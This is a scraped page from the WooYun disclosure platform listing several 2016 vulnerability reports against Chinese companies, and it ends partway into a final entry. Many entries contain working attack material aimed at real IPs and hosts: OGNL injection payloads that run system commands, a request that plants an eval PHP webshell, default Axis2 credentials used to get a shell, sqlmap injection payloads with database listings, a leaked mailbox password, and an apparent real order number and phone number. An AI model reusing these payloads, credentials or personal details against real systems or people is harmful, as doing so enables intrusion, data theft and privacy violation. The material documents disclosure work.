工商银行某网上缴费服务接口可通过单号遍历该缴费服务用户姓名&身份证号

缺陷编号: WooYun-2016-219438

漏洞标题: 工商银行某网上缴费服务接口可通过单号遍历该缴费服务用户姓名&身份证号

相关厂商: 中国工商银行

漏洞作者: 路人甲

提交时间: 2016-06-15 13:28

公开时间: 2016-06-20 13:50

漏洞类型: 设计缺陷/逻辑错误

危害等级: 低

自评Rank: 5

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 用户敏感信息泄漏

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-15: 细节已通知厂商并且等待厂商处理中
2016-06-15: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

缴费过程中的偶遇…

详细说明:

被贴罚单了,去网上缴费,然后打开工商银行手机端,e缴费。

QQ图片20160615110947.png

交通罚款

QQ图片20160615110959.png

输入罚单编号

QQ图片20160615111003.png

可以遍历罚单号,获得用户姓名及身份证号码,我很懒,此处就不去遍历了

QQ图片20160615111020.png

漏洞证明:

QQ图片20160615110947.png

QQ图片20160615110959.png

QQ图片20160615111003.png

QQ图片20160615111020.png

修复方案:

虽然不是什么大问题,感觉还是挺别扭的,自己的姓名和身份证号码不想外泄。

0day

天天果园某平台表达式注入(已Getshell)

缺陷编号: WooYun-2016-219335

漏洞标题: 天天果园某平台表达式注入(已Getshell)

相关厂商: fruitday.com

漏洞作者: A1opex

提交时间: 2016-06-15 06:49

公开时间: 2016-06-20 07:40

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 表达式注入

18人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-15: 细节已通知厂商并且等待厂商处理中
2016-06-15: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

“Some of us don’t get to grow old with the one we love.”
— “I’ll go old with her, Mr. Reese, just from afar.”

某天,阳光明媚,乌云密布,睡了个午觉,梦见某ip存在表达式注入,醒来打开电脑,凭借零散的记忆,然后就Getshell了

详细说明:

http://180.167.72.216:89

fruitday6.png

发现了一个表达式注入

fruitday5.png

payload

code 区域
%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

爆出绝对路径

尝试写shell

然而failed,访问其他页面都需要登录

想啊想,不能就这样放弃了呀

nmap扫一下,发现88端口还有一个web服务

fruitday2.png

巧的是

如果关闭了弹窗的话会被重定向到一个帮助文件,这个是不需要登录的

于是在89端口的表达式注入那里

code 区域
%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'cmd','/c','dir e:\*.jsp /s'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println('~'%2B'~~2')%2C%23matt.getWriter().println(%23e)%2C%23matt.getWriter().println('2~'%2B'~~')%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D

找到了88端口的这个web服务的物理路径

写shell

直接jsp肯定是不行的,然而jspx

fruitday4.png

fruitday1.png

总的来说就是从A服务的命令执行写shell到B服务进行访问的故事

漏洞证明:

http://180.167.72.216:89

fruitday6.png

发现了一个表达式注入

fruitday5.png

payload

code 区域
%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

爆出绝对路径

尝试写shell

然而failed,访问其他页面都需要登录

想啊想,不能就这样放弃了呀

nmap扫一下,发现88端口还有一个web服务

fruitday2.png

巧的是

如果关闭了弹窗的话会被重定向到一个帮助文件,这个是不需要登录的

于是在89端口的表达式注入那里

code 区域
%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'cmd','/c','dir e:\*.jsp /s'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println('~'%2B'~~2')%2C%23matt.getWriter().println(%23e)%2C%23matt.getWriter().println('2~'%2B'~~')%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D

找到了88端口的这个web服务的物理路径

写shell

直接jsp肯定是不行的,然而jspx

fruitday4.png

fruitday1.png

总的来说就是从A服务的命令执行写shell到B服务进行访问的故事

修复方案:

你懂的比我多呐>3<

版权声明:转载请注明来源 A1opex@乌云

0day

面包旅行某数据库未授权访问漏洞导致的任意文件读取和命令执行

缺陷编号: WooYun-2016-219258

漏洞标题: 面包旅行某数据库未授权访问漏洞导致的任意文件读取和命令执行

相关厂商: 面包旅行

漏洞作者: Mark

提交时间: 2016-06-15 01:37

公开时间: 2016-08-04 01:40

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-15: 细节已通知厂商并且等待厂商处理中
2016-06-15: 厂商已查看当前漏洞内容,细节仅向厂商公开
1970-01-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我是一个苦b的程序员,今晚加班到快通宵了,困得快睁不开眼了,女上司很关心,问我要不要吃宵夜。我没好气地说,宵夜就算了,能让我睡一觉就行了。女上司红着脸说了句讨厌啊,然后坐在我身边不动,好像距离我很近,搞得我很紧张,难道她发现我的程序出了bug?

详细说明:

漏洞原因:postgresql数据库未授权访问

漏洞ip:54.223.173.28

漏洞证明:

1.png

11.png

2.png

大量的数据表

33.png

但是好像没有发现敏感的的数据,然后就发现了这个,好像是数据库的日志信息?(屏幕不够大,显示的不够全)

3.png

就这样结束,不是我的性格(厂商可能不认可),然后搜索了一下 postgresql渗透 发现这个

http://zone.wooyun.org/content/4971 @疯狗

因为之前没搞过postgresql的渗透,没想到postgresql也有用户自定义函数,只是在我这里没有测试成功,在建立udf这一步的时候,会报这个错误

[Err] ERROR: could not load library “/var/lib/postgresql/9.3/main/cmd.so”: /var/lib/postgresql/9.3/main/cmd.so: file too short 古狗也没搜索到啥合适的答案,也就不细深入研究了(主要是懒)

不过 读取任意文件,执行一些敏感函数就足以证明其危害性。。。

4.png

文件读取.png

5.png

修复方案:

加认证

版权声明:转载请注明来源 Mark@乌云

0day

网秦某站弱口令导致的一次内网漫游

缺陷编号: WooYun-2016-219717

漏洞标题: 网秦某站弱口令导致的一次内网漫游

相关厂商: netqin.com

漏洞作者: niliu认证白帽子

提交时间: 2016-06-16 07:46

公开时间: 2016-06-21 09:10

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: getshell

4人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-16: 细节已通知厂商并且等待厂商处理中
2016-06-16: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

厂商给rank不要那么吝啬嘛 -,-

详细说明:

纯属偶遇,由Axis2的弱口令导致getshell,然后内网漫游了一下

http://211.151.59.27:80/axis2/axis2-admin/login

admin:axis2

QQ20160615-2.png

漏洞证明:

getshell

http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts

QQ20160615-1.png

QQ20160615-0.png

通过hosts可以看到是网秦的服务

code 区域
HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014
# HEADER: by puppet.  While it can still be managed manually, it
# HEADER: is definitely not recommended.
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1	localhost.localdomain	localhost BJ-YZ-S-ST040
::1	localhost6.localdomain6	localhost6
127.0.0.1	oversea
192.168.3.46	bjyz.puppet.nq.com
192.168.0.41	a03	pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com
192.168.0.217	a12	app.netqin.com
211.151.59.71	a09	blyt.netqin.com
192.168.0.143	a08	i.netqin.com i.nq.com m.nq.com
192.168.5.212	a13	c.cpsserver.cns
192.168.0.148	a05	nqses.nq.com
192.168.3.35	a11	pay.netqin.com pay.nq.com
192.168.3.53	a07	my.netqin.com
192.168.3.52	a06	mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com
192.168.5.216	a15	dbapp.nq.com
192.168.5.207	a16	dbboss.nq.com
192.168.5.218	a14	dbuis.nq.com

QQ20160615-3.png

拿到shell了,reGeorg开个代理进内网

namp扫了一下内网网段,内网比较大

设计大量内部系统,wiki,jenkins,jira,内部管理系统,会议室预定系统,报表管理系统等等,以及大量开发测试文档

QQ20160615-6.png

QQ20160615-8.png

QQ20160615-10.png

QQ20160615-11.png

QQ20160615-12.png

QQ20160615-13.png

QQ20160615-14.png

QQ20160615-15.png

程序员千行bug率….

QQ20160615-16.png

jenkins 又可以搞下好多机器了

QQ20160615-17.png

QQ20160615-19.png

QQ20160615-20.png

QQ20160615-21.png

QQ20160615-22.png

可申请点卡..

QQ20160615-23.png

QQ20160615-24.png

QQ20160615-26.png

QQ20160615-27.png

不深入测试了

修复方案:

1.修复弱口令

2.删除shell,不排除之前有人进来过

3.加强内网安全

版权声明:转载请注明来源 niliu@乌云

0day

保险安全之复星保德信某系统配置不当GetShell影响大量保单信息(包括姓名\身份证号\地址等)

缺陷编号: WooYun-2016-219715

漏洞标题: 保险安全之复星保德信某系统配置不当GetShell影响大量保单信息(包括姓名\身份证号\地址等)

相关厂商: pflife.com.cn

漏洞作者: 路人甲

提交时间: 2016-06-16 09:23

公开时间: 2016-06-16 13:51

漏洞类型: 系统/服务运维配置不当

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-16: 细节已通知厂商并且等待厂商处理中
2016-06-16: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

code 区域
mask 区域
1.http://**.**.**/

tomcat配置不当

code 区域
用户名:admin
密码:空

B1.png

IP判断:

B2.png

B3.png

jdbc:

code 区域
DBType=Oracle
IP=
mask 区域
*****7.2*****

Port=1521
DBName=orcl
UserName=

mask 区域
*****f*****

PassWord=

mask 区域
*****f*****

code 区域
AGENTCORE	FSINSURECHKDETAIL	162416
AGENTCORE	FJSPAYSUPPLIER	135833
AGENTCORE	FJAGETSUPPLIER	92395
AGENTCORE	FJBGETSUPPLIER	90774
AGENTCORE	FJBPAYCUSTOMER	89580
AGENTCORE	FJAPAYCUSTOMER	89580
AGENTCORE	FSINSUREPREM	78180
AGENTCORE	FCSUPPLIERLIST	72542
AGENTCORE	FCPOL	66997
AGENTCORE	FJSPAY	66981
DFDD	FAINDEXINFO	58701
AGENTCORE	FAINDEXINFO	58701
ZMWY	FAINDEXINFO	58701
ZMCBS	FAINDEXINFO	58701
SYS	SETTINGS$	50589
AGENTCORE	FCEXAM	48879
AGENTCORE	FCCONT	44573
AGENTCORE	FCCONTAGENT	43842
AGENTCORE	FCINSURED	42259
AGENTCORE	FJAPAY	39383
AGENTCORE	FJBPAY	39383

B4.png

漏洞证明:

code 区域
AGENTCORE	FSINSURECHKDETAIL	162416
AGENTCORE	FJSPAYSUPPLIER	135833
AGENTCORE	FJAGETSUPPLIER	92395
AGENTCORE	FJBGETSUPPLIER	90774
AGENTCORE	FJBPAYCUSTOMER	89580
AGENTCORE	FJAPAYCUSTOMER	89580
AGENTCORE	FSINSUREPREM	78180
AGENTCORE	FCSUPPLIERLIST	72542
AGENTCORE	FCPOL	66997
AGENTCORE	FJSPAY	66981
DFDD	FAINDEXINFO	58701
AGENTCORE	FAINDEXINFO	58701
ZMWY	FAINDEXINFO	58701
ZMCBS	FAINDEXINFO	58701
SYS	SETTINGS$	50589
AGENTCORE	FCEXAM	48879
AGENTCORE	FCCONT	44573
AGENTCORE	FCCONTAGENT	43842
AGENTCORE	FCINSURED	42259
AGENTCORE	FJAPAY	39383
AGENTCORE	FJBPAY	39383

B4.png

修复方案:

修改口令

版权声明:转载请注明来源 路人甲@乌云

0day

新浪乐居某系统存在SQL注入漏洞

缺陷编号: WooYun-2016-219921

漏洞标题: 新浪乐居某系统存在SQL注入漏洞

相关厂商: leju.com

漏洞作者: 路人甲

提交时间: 2016-06-16 17:16

公开时间: 2016-06-21 17:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-16: 细节已通知厂商并且等待厂商处理中
2016-06-16: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

http://shleju.w114.mc-test.com/

详细说明:

参数:xName

code 区域
POST /xiangmulistview.aspx HTTP/1.1
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Referer: http://shleju.w114.mc-test.com:80/
Cookie: ASP.NET_SessionId=rslqpvnnhedmgmilulgj3d0z
Host: shleju.w114.mc-test.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

xName=1*

漏洞证明:

code 区域
sqlmap identified the following injection point(s) with a total of 208 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
current user:    'sq_yusuan'
current database:    'sq_yusuan'
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
available databases [197]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] sq_1252724821
[*] sq_464475463
[*] sq_a0910205251
[*] sq_abc20131113
[*] sq_afanyi2013
[*] sq_agarwood
[*] sq_aixiu8023
[*] sq_almono
[*] sq_anadolu
[*] sq_angoltech
[*] sq_baiyuyin
[*] sq_bh2345l
[*] sq_bjsbfcsq
[*] sq_bocetest
[*] sq_cake88zs
[*] sq_camming
[*] sq_ceob521m
[*] sq_ceshisql
[*] sq_cf7191810
[*] sq_changshi82
[*] sq_chsichsi
[*] sq_ckts2014
[*] sq_cl2013
[*] sq_cnwoods
[*] sq_comsite
[*] sq_cqvitdb
[*] sq_czcwan123
[*] sq_danson
[*] sq_daohang0808
[*] sq_dbdg2011
[*] sq_dborder
[*] sq_ding2013
[*] sq_duduge1
[*] sq_duomeicc
[*] sq_dydongrui1
[*] sq_eastlowe
[*] sq_eastvendor
[*] sq_egrets2000
[*] sq_eimshouse
[*] sq_EMeal08
[*] sq_erpcqwjfccn
[*] sq_fanyi021net
[*] sq_feiyuxiu
[*] sq_fjjyyw2013
[*] sq_fjslsp
[*] sq_forid317
[*] sq_forwardtoys
[*] sq_freedomx
[*] sq_fxy0831
[*] sq_fzgrcycom
[*] sq_fzhou223mssql
[*] sq_gkbbt2
[*] sq_globalshare
[*] sq_gywdhg
[*] sq_gzdycom
[*] sq_gzjspxw123
[*] sq_gzxinhaosi2
[*] sq_h18918960336
[*] sq_hanwei123
[*] sq_hlsyh520
[*] sq_hmddream
[*] sq_hnpgxh
[*] sq_hnswms
[*] sq_hongstar365
[*] sq_huadingit
[*] sq_huiyoush
[*] sq_hunnintu
[*] sq_hxlr2013
[*] sq_hymz888
[*] sq_iuiyiuiy2
[*] sq_jbb365
[*] sq_jiayi161
[*] sq_jinbo6211
[*] sq_jinriyuqid
[*] sq_jinrong0808
[*] sq_jixingbang
[*] sq_jqsy1718
[*] sq_jsgwyksw
[*] sq_jtwdfw
[*] sq_junweisiqwe
[*] sq_juyu2015
[*] sq_jxg1124
[*] sq_kezhang0808
[*] sq_kuer1002
[*] sq_lantolink
[*] sq_lawer360
[*] sq_layer100
[*] sq_liuyinyu
[*] sq_liuyong7520
[*] sq_ljstrb
[*] sq_longhuyi
[*] sq_lsvcom
[*] sq_lvegunet
[*] sq_lzncic
[*] sq_mrmf0001
[*] sq_mrzdh2233
[*] sq_mswh3way
[*] sq_muchendiban
[*] sq_myintersys
[*] sq_mytestdb
[*] sq_mywslw
[*] sq_nbyaocai123
[*] sq_newswap
[*] sq_nf888888
[*] sq_NJDT2015
[*] sq_ntim20130930
[*] sq_pailew
[*] sq_pingou
[*] sq_pjkc
[*] sq_ptsgxq
[*] sq_pxid2013
[*] sq_qest2013
[*] sq_qiaoyf
[*] sq_qichao3000
[*] sq_qiuh9208
[*] sq_qq1012647
[*] sq_qq503037121
[*] sq_qqqnweb
[*] sq_rongyou2014
[*] sq_shanghu2013
[*] sq_shazhongq
[*] sq_shboyon2
[*] sq_shchezhixiao
[*] sq_shdashequ
[*] sq_shengzhaobio
[*] sq_shiyin520
[*] sq_shjmkq2000
[*] sq_shkj140813
[*] sq_shkj150425
[*] sq_shkj150721
[*] sq_shkj151016
[*] sq_shkj151026
[*] sq_shkj151217
[*] sq_shkj160503
[*] sq_shkj160509
[*] sq_shkj160525
[*] sq_shkj160603
[*] sq_shujuguanli
[*] sq_shujuku2013
[*] sq_shyunwen20131
[*] sq_sinee2016
[*] sq_siteserver
[*] sq_sitytech2013
[*] sq_sql2000date
[*] sq_sql2000wd
[*] sq_sqltopcourage
[*] sq_ssdd2013
[*] sq_stgdsyxx
[*] sq_sunpcdb1
[*] sq_sunshine2
[*] sq_talentcorpdb1
[*] sq_tbcxmb
[*] sq_tcby002
[*] sq_tcdq1974
[*] sq_testlaskdjf
[*] sq_tger258369
[*] sq_tingyou123
[*] sq_ufolbb2013
[*] sq_ujoygroup
[*] sq_w123456
[*] sq_wczx98
[*] sq_web8980
[*] sq_wem520
[*] sq_wesleydata
[*] sq_wlcyjd
[*] sq_wxpneumdata
[*] sq_wyxfl1
[*] sq_x2013l
[*] sq_xad20140530
[*] sq_xdpc111
[*] sq_xifashui
[*] sq_xiqing3
[*] sq_xnkq2013
[*] sq_yachuan
[*] sq_yanglan21v
[*] sq_yangyang
[*] sq_yanvps
[*] sq_yczedu
[*] sq_yfplastic001
[*] sq_yuanbxjz
[*] sq_yuetong
[*] sq_yusuan
[*] sq_yuyue
[*] sq_yzspfx
[*] sq_zenrebrand
[*] sq_zhangma
[*] sq_zhuanyi1
[*] sq_zjp03701
[*] sq_zjtonglicom
[*] sq_zslpms13
[*] sq_zukexbaicai
[*] tempdb

1.png

2.png

3.png

4.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-21 17:30

厂商回复:

漏洞Rank:15 (WooYun评价)

0day

YY浏览器远程命令执行(两种姿势)

缺陷编号: WooYun-2016-220233

漏洞标题: YY浏览器远程命令执行(两种姿势)

相关厂商: 广州多玩

漏洞作者: zhchbin

提交时间: 2016-06-17 16:44

公开时间: 2016-09-20 16:50

漏洞类型: 远程代码执行

危害等级: 高

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

3人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-17: 细节已通知厂商并且等待厂商处理中
2016-06-22: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息

简要描述:

我以为我的温柔,能给你整个宇宙。

漏洞hash:b738c92c12c83fad41215e846716cd42

版权声明:转载请注明来源 zhchbin@乌云

0day

ChinaCache某系统补丁不及时导致getshell可威胁内网

缺陷编号: WooYun-2016-220339

漏洞标题: ChinaCache某系统补丁不及时导致getshell可威胁内网

相关厂商: ChinaCache

漏洞作者: 路人甲

提交时间: 2016-06-17 21:28

公开时间: 2016-06-22 17:09

漏洞类型: 系统/服务补丁不及时

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

1人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-17: 细节已通知厂商并且等待厂商处理中
2016-06-17: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

补丁不及时导致getshell可威胁内网

详细说明:

http://223.203.210.213/

QQ截图20160617203831.png

code 区域
/plugins/weathermap/editor.php?plug=0&mapname=404.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=%3C?php%20echo%28md5%281%29%29;@eval%28$_POST[qjd]%29;?%3E&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name

直接生成shell

shell地址: plugins/weathermap/configs/404.php 口令: qjd

漏洞证明:

QQ截图20160617203915.png

QQ截图20160617203935.png

光删马是没用的,重要的是补丁

QQ截图20160617204016.png

修复方案:

删除shell,补丁

版权声明:转载请注明来源 路人甲@乌云

0day

瑞银信某内部邮箱一枚

缺陷编号: WooYun-2016-220623

漏洞标题: 瑞银信某内部邮箱一枚

相关厂商: ruiyinxin.com

漏洞作者: 路人甲

提交时间: 2016-06-18 19:34

公开时间: 2016-06-23 23:00

漏洞类型: 账户体系控制不严

危害等级: 低

自评Rank: 1

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签:

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-18: 细节已通知厂商并且等待厂商处理中
2016-06-18: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

泄露地址

code 区域
https://github.com/suntinghui/BaiFuTongApp/blob/ea45f886332348aa871cd18204029f086d338e22/BaiFuTongApp/Source/Controller/SuggestionBackViewController.m

code 区域
testMsg.login = @"service-snd@ruiyinxin.com";
testMsg.pass = @"1m2n3b4v";

github.png

漏洞证明:

成功登录

邮箱.png

没啥敏感信息。。。

修复方案:

删除

版权声明:转载请注明来源 路人甲@乌云

0day

唐朝扫描器某处越权可查看插件EXP

缺陷编号: WooYun-2016-217649

漏洞标题: 唐朝扫描器某处越权可查看插件EXP

相关厂商: 乌云官方

漏洞作者: 老黑

提交时间: 2016-06-18 07:51

修复时间: 2016-06-18 09:50

公开时间: 2016-06-18 09:50

漏洞类型: 未授权访问/权限绕过

危害等级: 中

自评Rank: 5

漏洞状态: 厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 未授权访问

1人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-18: 细节已通知厂商并且等待厂商处理中
2016-06-18: 厂商已经确认,细节仅向厂商公开
2016-06-18: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

唐朝扫描器某处越权可查看插件EXP

详细说明:

为了获取邀请码,然后提交了新的插件,在邀请码通过后,会有一段时间访客可以免费查看到页面源码

这个时候 插件作者会以店小二为名

111.png

已知目前曝光的后门作者写了个工具,在不停的获取最新的唐朝EXP

地址:http://m7lrv.blog.expnet.cn

11.png

利用很简单,不停的获取 http://www.tangscan.com/plugins 页面上的最新漏洞,然后依次访问,然后判断网页中的EXP是否可见。

aa60608235723.png

于是插件作者的劳动果实就被人不劳而获了。

漏洞证明:

为了获取邀请码,然后提交了新的插件,在邀请码通过后,会有一段时间访客可以免费查看到页面源码

这个时候 插件作者会以店小二为名

111.png

已知目前曝光的后门作者写了个工具,在不停的获取最新的唐朝EXP

地址:http://m7lrv.blog.expnet.cn

11.png

利用很简单,不停的获取 http://www.tangscan.com/plugins 页面上的最新漏洞,然后依次访问,然后判断网页中的EXP是否可见。

aa60608235723.png

于是插件作者的劳动果实就被人不劳而获了。

修复方案:

权限修改

版权声明:转载请注明来源 老黑@乌云

0day

去哪儿某处查询他人订单

缺陷编号: WooYun-2016-220349

漏洞标题: 去哪儿某处查询他人订单

相关厂商: 去哪儿

漏洞作者: 路人甲

提交时间: 2016-06-18 08:43

公开时间: 2016-06-20 10:11

漏洞类型: 设计缺陷/逻辑错误

危害等级: 中

自评Rank: 5

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 应用敏感信息泄漏

0人收藏 收藏

分享漏洞:


漏洞详情

披露状态:

2016-06-18: 细节已通知厂商并且等待厂商处理中
2016-06-18: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

去哪儿订单任意查询
http://touch.qunar.com/
手机登陆端
于是就借了同事去哪儿账号登陆
查看订单

详细说明:

http://touch.qunar.com/

手机登陆端

于是就借了同事去哪儿账号登陆

查看订单

1

/flightOrderDetail.jsp?orderNo=xxxxxxxx&mobile=1860xxxxxx&sn=9FC5A13F13384B98EBE251472B1F8411&r=1&bd_source=3w_flight_sms&bd_from_id=wise&bd_ref_id=light_null&bd_channel_id=light_null&bd_sub_page=h5_mobile&bd_source_light=2264015

orderno=订单号

moble=就是手机好了

其他参数都是 null=空

意思就是说只要有了这两件东西 岂不就是随变查看女神在去哪儿的秘密呢吗

抓包爆破

扫了半天就出来一个

lxh130430100540515 18611932216

漏洞证明:

123.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

0day

16wifi某第三方系统从爆破用户到四台终端命令执行/涉及主干等多个项目源码

缺陷编号: WooYun-2016-221168

漏洞标题: 16wifi某第三方系统从爆破用户到四台终端命令执行/涉及主干等多个项目源码

